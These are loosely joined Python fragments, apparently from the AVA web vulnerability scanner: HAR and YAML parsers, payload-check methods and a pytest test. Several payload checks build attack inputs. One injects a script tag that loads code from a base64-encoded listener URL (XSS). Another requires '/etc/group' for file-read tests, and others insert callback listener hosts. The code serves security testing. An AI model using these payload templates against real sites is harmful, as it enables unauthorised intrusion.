def parse(self, configs):
"""
Parses a list of HAR files. Vectors from each HAR file are combined and returned as a list.
:param configs: AVA configs
:return: list of vectors as dictionaries
"""
combined = []
# parse each vector file in list
for name in self._sources:
logger.debug("Reading vectors from '%s'.", name)
try:
# load HAR as json
with open(name) as f:
har = json.load(f)
# get requests
requests = [
entry['request'] for entry in har['log']['entries']
]
# parse requests
vectors = self._parse_requests(requests, configs, name)
# combine
combined.extend(vectors)
except JSONDecodeError as e:
raise InvalidFormatException(e)
except KeyError as e:
raise InvalidFormatException("{} missing in '{}'".format(
e, name))
return combined
def _parse_multipart(self, multipart_string, content_type):
"""
Parse multipart data string and return decoder object.
:param multipart_string: multipart data string
:param content_type: content-type string
:return: Multipart decoder
"""
# parse
try:
decoder = MultipartDecoder(multipart_string.encode(), content_type)
except ImproperBodyPartContentException:
raise InvalidFormatException("Unable to parse multipart form data")
except (NonMultipartContentTypeException, AttributeError):
raise InvalidFormatException(
"Unable to parse multipart content-type")
return decoder
def _check_payloads(self, payloads):
"""
Checks if the payloads are adoptable for this class and modify the payloads to adjust to check function.
InvalidFormatException is raised, if a payload is not adoptable.
Children can override.
:param payloads: list of payloads
:return: list of modified payloads
"""
for i, payload in enumerate(payloads):
if '/etc/group' not in payload:
raise InvalidFormatException("Payload of {} must include '/etc/group'".format(self.key))
return payloads
def _check_payloads(self, payloads):
"""
Checks if the payloads are adoptable for this class and modify the payloads to adjust to check function.
InvalidFormatException is raised, if a payload is not adoptable.
:param payloads: list of payloads
:return: list of modified payloads
"""
for i, payload in enumerate(payloads):
if '{}' not in payload:
raise InvalidFormatException("Payload of {} must include '{{}}'".format(self.key))
payloads[i] = payload.format(self._listener)
return payloads
def parse(self):
"""
Parses YAML configuration file and creates configs in the same format as default configs. Default configs
is checked to verify data types. None values are filtered from lists to prevent evaluating to True later.
:return: dictionary of configs
"""
try:
# read yaml
with open(self._source) as f:
configs = yaml.safe_load(f)
except (ParserError, ScannerError) as e:
raise InvalidFormatException("{} on line {}".format(
e.problem.capitalize(), e.problem_mark.line))
# check configs
if not configs:
logger.debug("Configuration file '%s' is empty. Ignoring.",
self._source)
return {}
for key, values in configs.items():
# check key
if key not in self._schema:
raise UnknownKeyException(
"'{}' is not a valid configuration".format(key))
# check values
if values is None:
continue
# check type
if not isinstance(values, self._schema[key]):
raise InvalidFormatException("'{}' must be a {}".format(
key, self._schema[key].__name__))
# filter none from lists
if isinstance(values, list):
configs[key] = list(filter(None, values))
return configs
def _parse_json(self, json_string):
"""
Parse JSON string and return object.
:param json_string: JSON as string
:return: JSON as object
"""
# parse
try:
loaded = json.loads(json_string)
except JSONDecodeError:
raise InvalidFormatException("Unable to parse JSON")
return loaded
def _check_payloads(self, payloads):
"""
Checks if the payloads are adoptable for this class and modify the payloads to adjust to check function.
InvalidFormatException is raised, if a payload is not adoptable.
Children can override.
:param payloads: list of payloads
:return: list of modified payloads
"""
for i, payload in enumerate(payloads):
if '<{}' not in payload:
raise InvalidFormatException("Payload of {} must have a tag named '{{}}'".format(self.key))
payloads[i] = payload.format(self._random, self._random)
return payloads
def _parse_xml(self, xml_string):
"""
Parse the XML string and return the root element.
:param xml_string: XML as string
:return: root element
"""
# parse
try:
root = ElementTree.fromstring(xml_string)
except ParseError:
raise InvalidFormatException("Unable to parse XML string")
# return
return root
def _check_payloads(self, payloads):
"""
Checks if the payloads are adoptable for this class and modify the payloads to adjust to check function.
InvalidFormatException is raised, if a payload is not adoptable.
:param payloads: list of payloads
:return: list of modified payloads
"""
# parse url
parsed = urlparse(self._listener)
for i, payload in enumerate(payloads):
if re.match(r"\{\}.*\{\}", payload) is None:
raise InvalidFormatException(
"Payload of {} must include two of '{{}}' which will be replaced with scheme and host name"
.format(self.key))
payloads[i] = payload.format(parsed.scheme, parsed.netloc)
return payloads
def _check_payloads(self, payloads):
"""
Checks if the payloads are adoptable for this class and modify the payloads to adjust to check function.
InvalidFormatException is raised, if a payload is not adoptable.
:param payloads: list of payloads
:return: list of modified payloads
"""
# encode listener and format script
template = "s=document.createElement('script');s.src=atob('{}');document.head.appendChild(s);"
encoded = base64.b64encode(self._listener.encode()).decode()
script = template.format(encoded)
# generate payloads
for i, payload in enumerate(payloads):
if '{}' not in payload:
raise InvalidFormatException("Payload of {} must include '{{}}'".format(self.key))
payloads[i] = payload.format(script)
return payloads
def test_main_negative(mocker):
# missing vector file
args = []
test = ava.scanner.main(args)
assert test == 2
# vector file not exists
args = ["test.json"]
mocker.patch("os.path.isfile", return_value=False)
test = ava.scanner.main(args)
assert test == 2
# config reader missing component
args = ["-c", "config.yml", "test.json"]
mocker.patch("os.path.isfile", return_value=True)
mocker.patch("ava.scanner._parse_yaml",
side_effect=MissingComponentException("Missing config file"))
test = ava.scanner.main(args)
assert test == 2
# config reader invalid format
args = ["-c", "config.yml", "test.json"]
mocker.patch("os.path.isfile", return_value=True)
mocker.patch(
"ava.scanner._parse_yaml",
side_effect=InvalidFormatException("Invalid config file format"))
test = ava.scanner.main(args)
assert test == 2
# config reader unknown key
args = ["-c", "config.yml", "test.json"]
mocker.patch("os.path.isfile", return_value=True)
mocker.patch("ava.scanner._parse_yaml",
side_effect=UnknownKeyException("Unknown config file key"))
test = ava.scanner.main(args)
assert test == 2
# config generate invalid value
args = ["test.json"]
mocker.patch("os.path.isfile", return_value=True)
mocker.patch("ava.common.config.generate",
side_effect=InvalidValueException("Config invalid value"))
test = ava.scanner.main(args)
assert test == 2
# config generate unknown key
args = ["test.json"]
mocker.patch("os.path.isfile", return_value=True)
mocker.patch("ava.common.config.generate",
side_effect=UnknownKeyException("Config unknown key"))
test = ava.scanner.main(args)
assert test == 2
# run scanner missing component
args = ["test.json"]
mocker.patch("os.path.isfile", return_value=True)
mocker.patch("ava.common.config.generate")
mocker.patch(
"ava.scanner._run_scanner",
side_effect=MissingComponentException("Run missing component"))
test = ava.scanner.main(args)
assert test == 2
# run scanner invalid format
args = ["test.json"]
mocker.patch("os.path.isfile", return_value=True)
mocker.patch("ava.common.config.generate")
mocker.patch("ava.scanner._run_scanner",
side_effect=InvalidFormatException("Invalid JSON format"))
test = ava.scanner.main(args)
assert test == 2